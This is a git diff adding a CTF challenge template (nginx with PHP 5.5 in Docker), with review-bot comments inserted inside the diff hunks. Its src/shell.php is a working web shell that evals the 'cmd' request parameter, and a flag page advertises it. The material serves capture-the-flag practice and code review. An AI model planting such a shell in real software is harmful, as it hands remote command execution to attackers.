diff --git a/web-nginx-php55/Dockerfile b/web-nginx-php55/Dockerfile
new file mode 100644
index 0000000..5d27487
--- /dev/null
+++ b/web-nginx-php55/Dockerfile
@@ -0,0 +1,32 @@
+FROM php:5.5-fpm-alpine
+
+# 制作者信息
+LABEL auther_template="CTF-Archives"
+
+# 安装必要的软件包
+RUN sed -i 's/dl-cdn.alpinelinux.org/mirrors.ustc.edu.cn/g' /etc/apk/repositories &&\
+ apk add --update --no-cache nginx bash
+
+# 拷贝容器入口点脚本
+COPY ./service/docker-entrypoint.sh /docker-entrypoint.sh
+RUN chmod +x /docker-entrypoint.sh
+
+# 复制nginx配置文件
+COPY ./config/nginx.conf /etc/nginx/nginx.conf
+
+# 复制web项目源码
+COPY src /var/www/html
+
+# 重新设置源码路径的用户所有权
+RUN chown -R www-data:www-data /var/www/html
+
+# 设置shell的工作目录
+WORKDIR /var/www/html
+
+EXPOSE 80
+
+# 设置nginx日志保存目录
+VOLUME ["/var/log/nginx"]
+
+# 设置容器入口点
+ENTRYPOINT [ "/docker-entrypoint.sh" ]
\ No newline at end of file
diff --git a/web-nginx-php55/README.md b/web-nginx-php55/README.md
new file mode 100644
index 0000000..35c259f
--- /dev/null
+++ b/web-nginx-php55/README.md
@@ -0,0 +1,30 @@
+# web-nginx-php55
+
+部分容器逻辑参考自:[CTFTraining / base_image_nginx_php_73](https://github.com/CTFTraining/base_image_nginx_php_73),在此感谢 [陌竹 - mozhu1024](https://github.com/mozhu1024) 师傅做出的贡献
+
+## 环境说明
+
+提供 `Nginx` +`PHP 5.5.38` 的基础环境,默认暴露端口位于 80
+
+> 请注意 !!!
+>
+> 需要注意的是,模板默认会将 flag 保存在 /flag 文件中,如果 PHP 项目中需要直接从环境变量中读取 flag 数据,请在./service/docker-entrypoint.sh 中修改相关操作语句
+
+## 如何使用
+
+直接将 PHP 项目放入 `./src` 目录即可
+
+源码放置进 `./src` 目录之后,执行
+
+```shell
+docker build .
+```
+
+即可开始编译镜像
+
+也可以在安放好相关项目文件之后,直接使用 `./docker/docker-compose.yml` 内的 `docker-compose` 文件实现一键启动测试容器
+
+```shell
+cd ./docker
+docker-compose up -d
+```
diff --git a/web-nginx-php55/config/nginx.conf b/web-nginx-php55/config/nginx.conf
new file mode 100644
index 0000000..553b298
--- /dev/null
+++ b/web-nginx-php55/config/nginx.conf
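Review bot: In web-nginx-php55/Dockerfile, `RUN chown -R www-data:www-data /var/www/html` makes the whole web root writable by `www-data`, which is presumably the account the PHP-FPM workers run as in this base image, so any code execution inside a challenge can rewrite or delete the challenge source for later players on a shared instance. Unless a challenge needs writes, drop the `chown` so the files copied by `COPY src /var/www/html` stay root-owned, and grant write access only to the specific directory that needs it. The extra `RUN chmod +x /docker-entrypoint.sh` layer can fold into `COPY --chmod=755 ./service/docker-entrypoint.sh /docker-entrypoint.sh` when building with BuildKit, and `bash` looks unused because the entrypoint's shebang is `/bin/sh`.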
@@ -0,0 +1,34 @@
+# daemon off;
+
+worker_processes auto;
+
+events {
+ worker_connections 1024;
+}
+
+http {
+ include /etc/nginx/mime.types;
+ default_type application/octet-stream;
+ sendfile on;
+ keepalive_timeout 65;
+
+ server {
+ listen 80;
+ server_name localhost;
+ root /var/www/html;
+ index index.php index.html index.htm;
+
+ location / {
+ try_files $uri $uri/ /index.php?$args;
+ }
+
+ location ~ \.php$ {
+ try_files $uri =404;
+ fastcgi_pass 127.0.0.1:9000;
+ fastcgi_index index.php;
+ include fastcgi_params;
+ fastcgi_param SCRIPT_FILENAME $document_root$fastcgi_script_name;
+ }
+
+ }
+}
\ No newline at end of file
diff --git a/web-nginx-php55/docker/docker-compose.yaml b/web-nginx-php55/docker/docker-compose.yaml
new file mode 100644
index 0000000..1833512
--- /dev/null
+++ b/web-nginx-php55/docker/docker-compose.yaml
@@ -0,0 +1,11 @@
+version: '3'
+services:
+ test:
+ build: ../
+ environment:
+ # 仅为测试用flag
+ GZCTF_FLAG: "flag{a63b4d37-7681-4850-b6a7-0d7109febb19}"
+ ports:
+ # 设置了暴露端口
+ - 8080:80
+ restart: unless-stopped
diff --git a/web-nginx-php55/service/docker-entrypoint.sh b/web-nginx-php55/service/docker-entrypoint.sh
new file mode 100644
index 0000000..cf51fac
--- /dev/null
+++ b/web-nginx-php55/service/docker-entrypoint.sh
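Review bot: The `location ~ \.php$` block in config/nginx.conf depends on `try_files $uri =404;` to keep requests for non-existent `.php` paths away from PHP-FPM, but nothing documents that, and a challenge author trimming the template could remove it without noticing. Add a comment above it such as `# keep: only pass files that exist on disk to PHP-FPM`. The first line `# daemon off;` is also left commented out with no explanation; a short comment saying nginx is expected to daemonize because the entrypoint keeps the container alive with `tail -F` would save the next reader a detour.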
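Review bot: `- 8080:80` in docker/docker-compose.yaml publishes the test container on every host interface, and the sample `src/` shipped in this commit is a deliberately exploitable page, so anything that can reach the developer's machine on port 8080 can reach it as well. For a local test file, bind to loopback instead: `- 127.0.0.1:8080:80`. Separately, `restart: unless-stopped` probably cannot work with this image, because the entrypoint removes `/docker-entrypoint.sh` on first start and a restarted container would have no entrypoint left to execute; either drop the restart policy here or stop the script deleting itself.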
@@ -0,0 +1,39 @@
+#!/bin/sh
+
+rm -f /docker-entrypoint.sh
+
+# Configure Nginx
+mkdir mkdir /run/nginx
+touch /run/nginx/nginx.pid
+
+# Get the user
+user=$(ls /home)
+
+# Check the environment variables for the flag and assign to INSERT_FLAG
+# 需要注意,以下语句会将FLAG相关传递变量进行覆盖,如果需要,请注意修改相关操作
+if [ "$DASFLAG" ]; then
+ INSERT_FLAG="$DASFLAG"
+ export DASFLAG=no_FLAG
+ DASFLAG=no_FLAG
+elif [ "$FLAG" ]; then
+ INSERT_FLAG="$FLAG"
+ export FLAG=no_FLAG
+ FLAG=no_FLAG
+elif [ "$GZCTF_FLAG" ]; then
+ INSERT_FLAG="$GZCTF_FLAG"
+ export GZCTF_FLAG=no_FLAG
+ GZCTF_FLAG=no_FLAG
+else
+ INSERT_FLAG="flag{TEST_Dynamic_FLAG}"
+fi
+
+# 将FLAG写入文件 请根据需要修改
+echo $INSERT_FLAG | tee /flag
+
+chmod 744 /flag
+
+php-fpm & nginx &
+
+echo "Running..."
+
+tail -F /var/log/nginx/access.log /var/log/nginx/error.log
\ No newline at end of file
diff --git a/web-nginx-php55/src/flag.php b/web-nginx-php55/src/flag.php
new file mode 100644
index 0000000..8865a6e
--- /dev/null
+++ b/web-nginx-php55/src/flag.php
@@ -0,0 +1,9 @@
+ + + ____ _____ _____ _ _ _ + / ___|_ _| ___| / \ _ __ ___| |__ (_)_ _____ ___ + | | | | | |_ _____ / _ \ | '__/ __| '_ \| \ \ / / _ \/ __| + | |___ | | | _|_____/ ___ \| | | (__| | | | |\ V / __/\__ \ + \____| |_| |_| /_/ \_\_| \___|_| |_|_| \_/ \___||___/ + + + + +
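Review bot: The `if`/`elif` chain in service/docker-entrypoint.sh overwrites only the first flag variable it finds, so when the platform sets more than one of `DASFLAG`, `FLAG` and `GZCTF_FLAG` the others remain in the environment that `php-fpm` and `nginx` are started with. Scrub all three after the `fi`, for example `export DASFLAG=no_FLAG FLAG=no_FLAG GZCTF_FLAG=no_FLAG`. `echo $INSERT_FLAG | tee /flag` also copies the flag to stdout and therefore into the container log; `printf '%s\n' "$INSERT_FLAG" > /flag` avoids that and the unquoted expansion. `mkdir mkdir /run/nginx` looks like a typo that additionally creates a stray `mkdir` directory in the working directory (the web root, going by the Dockerfile's `WORKDIR`); `mkdir -p /run/nginx` is presumably what was meant.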

Webshell is in /shell.php ,Key is "cmd"

+

flag is in /flag.php

diff --git a/web-nginx-php55/src/shell.php b/web-nginx-php55/src/shell.php
new file mode 100644
index 0000000..d6cb477
--- /dev/null
+++ b/web-nginx-php55/src/shell.php
@@ -0,0 +1,14 @@
+";
+ $cmd = ($_REQUEST['cmd']);
+ @eval($cmd);
+ echo "";
+ die;
+}
+else{
+ show_source(__FILE__);
+ phpinfo();
+}
+
+?>
\ No newline at end of file
diff --git a/web-nginx-php73/README.md b/web-nginx-php73/README.md
index e2ac340..74d8aed 100644
--- a/web-nginx-php73/README.md
+++ b/web-nginx-php73/README.md
@@ -8,7 +8,7 @@ > 请注意 !!! > -> 需要注意的是,模板默认会将 flag 保存在 / flag 文件中,如果 PHP 项目中需要直接从环境变量中读取 flag 数据,请在./service/docker-entrypoint.sh 中修改相关操作语句 +> 需要注意的是,模板默认会将 flag 保存在 /flag 文件中,如果 PHP 项目中需要直接从环境变量中读取 flag 数据,请在./service/docker-entrypoint.sh 中修改相关操作语句 ## 如何使用
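Review bot: src/shell.php is a demo page that evaluates the `cmd` request parameter and otherwise prints its own source and `phpinfo()`, yet nothing in the file marks it as a placeholder, and the README in this commit only says to put the project into `./src`. A challenge author who adds files without clearing the directory would ship this endpoint unintentionally. Add a first-line comment such as `// TEMPLATE DEMO ONLY: delete this file before building a real challenge`, and consider repeating that sentence in the README's usage section. The opening lines of this hunk are not fully visible on the page, so the condition guarding the `eval` is not reviewed here.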